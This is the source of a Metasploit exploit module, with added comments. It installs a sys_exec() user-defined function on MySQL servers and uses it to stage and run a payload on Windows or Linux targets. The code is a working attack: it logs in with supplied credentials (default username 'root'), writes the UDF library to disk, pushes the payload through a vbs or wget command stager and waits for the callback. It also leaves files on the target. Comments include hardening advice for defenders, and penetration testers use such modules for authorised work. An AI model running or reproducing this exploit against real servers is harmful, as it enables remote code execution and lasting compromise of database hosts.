GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/mysql/mysql_udf_payload.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
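# Metasploit exploit module: post-authentication command execution on a MySQL
# server through a user-defined function (UDF).
#
# Flow, as implemented below: reuse an existing MySQL session or log in with
# USERNAME/PASSWORD, make sure a sys_exec() UDF is present (installing it with
# mysql_add_sys_exec when it is missing or FORCE_UDF_UPLOAD is set), then stage
# the payload through sys_exec() with a command stager.
#
# Notes for defenders and for operators planning cleanup:
# - Valid MySQL credentials or an established session are a precondition.
# - Per the module description, the UDF library and the payload executable
#   remain on the server and sys_eval()/sys_exec() are defined or redefined;
#   nothing in this class removes them.
# - General MySQL hardening that limits this technique: withhold the FILE
#   privilege from application accounts, set secure_file_priv, keep the plugin
#   directory unwritable by the service account, run the service unprivileged,
#   and audit mysql.func for functions the DBA did not create.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::MYSQL
  include Msf::Exploit::CmdStager
  include Msf::OptionalSession::MySQL

  # Registers module metadata and the module-specific options.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Oracle MySQL UDF Payload Execution',
        'Description' => %q{
          This module creates and enables a custom UDF (user defined function) on the
          target host via the SELECT ... into DUMPFILE method of binary injection. On
          default Microsoft Windows installations of MySQL (=< 5.5.9), directory write
          permissions not enforced, and the MySQL service runs as LocalSystem.

          NOTE: This module will leave a payload executable on the target system when the
          attack is finished, as well as the UDF DLL, and will define or redefine sys_eval()
          and sys_exec() functions.
        },
        'Author' => [
          'Bernardo Damele A. G. <bernardo.damele[at]gmail.com>', # the lib_mysqludf_sys.dll binaries
          'todb', # this Metasploit module
          'h00die' # linux addition
        ],
        'License' => MSF_LICENSE,
        'References' => [
          # Bernardo's work with cmd exec via udf
          [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ]
        ],
        'Platform' => ['win', 'linux'],
        'Targets' => [
          [ 'Windows', { 'CmdStagerFlavor' => 'vbs' } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit)
          [ 'Linux', { 'CmdStagerFlavor' => 'wget' } ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2009-01-16', # Date of Bernardo's blog post.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          # The description above states that the UDF library and the payload
          # executable stay on the target, so that side effect is declared
          # instead of being left as unknown.
          'SideEffects' => [ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options(
      [
        OptBool.new('FORCE_UDF_UPLOAD', [ false, 'Always attempt to install a sys_exec() mysql.function.', false ]),
        OptString.new('USERNAME', [ false, 'The username to authenticate as', 'root' ])
      ]
    )
  end

  # Marks the module as requiring authentication before it can run.
  #
  # @return [Boolean] always true
  def post_auth?
    true
  end

  # @return [String, nil] the USERNAME datastore option
  def username
    datastore['USERNAME']
  end

  # PASSWORD is not registered in this file; presumably it comes from one of
  # the included mixins (confirm against Msf::Exploit::Remote::MYSQL).
  #
  # @return [String, nil] the PASSWORD datastore option
  def password
    datastore['PASSWORD']
  end

  # Obtains a MySQL connection, records the server architecture in
  # @mysql_arch and makes sure sys_exec() exists, recording the outcome in
  # @mysql_sys_exec_available.
  #
  # NOTE(review): m is assigned only on the login path. When an existing
  # session is used this method returns nil, and #exploit then stops at its
  # first guard, after mysql_add_sys_exec may already have run. A run that
  # looks like it did nothing can therefore still have left the UDF behind;
  # check the target for it during cleanup.
  #
  # @return [Object, nil] the value returned by mysql_login, or nil when login
  #   fails or when a session is used (see note above)
  def login_and_get_sys_exec
    if session
      # Reuse the client of the already established session.
      print_status("Using existing session #{session.sid}")
      self.mysql_conn = session.client
    else
      # No session: authenticate against the 'mysql' database.
      m = mysql_login(username, password, 'mysql')
      return unless m
    end

    @mysql_arch = mysql_get_arch
    @mysql_sys_exec_available = mysql_check_for_sys_exec
    if !@mysql_sys_exec_available || datastore['FORCE_UDF_UPLOAD']
      # Install the UDF, then re-check instead of assuming the install worked.
      mysql_add_sys_exec
      @mysql_sys_exec_available = mysql_check_for_sys_exec
    else
      print_status "sys_exec() already available, using that (override with FORCE_UDF_UPLOAD)."
    end

    m
  end

  # CmdStager callback: runs one stager command through the sys_exec() UDF.
  #
  # @param cmd [String] command line produced by the command stager
  # @param opts [Hash] stager options; not used here
  def execute_command(cmd, opts)
    mysql_sys_exec(cmd, datastore['VERBOSE'])
  end

  # Module entry point. Stops without staging anything when the connection
  # step returns nil, when the architecture is not one of the four supported
  # values, or when sys_exec() is not available. Those early exits skip the
  # final disconnect, exactly as the nested branches they replace did.
  def exploit
    return unless login_and_get_sys_exec

    unless %i[win32 win64 linux64 linux32].include?(@mysql_arch)
      print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'")
      return
    end

    unless @mysql_sys_exec_available
      print_status("MySQL function sys_exec() not available")
      return
    end

    # nodelete: the stager does not remove what it wrote, which matches the
    # description's warning about leftover files.
    execute_cmdstager({ :linemax => 1500, :nodelete => true })
    handler

    disconnect
  end
end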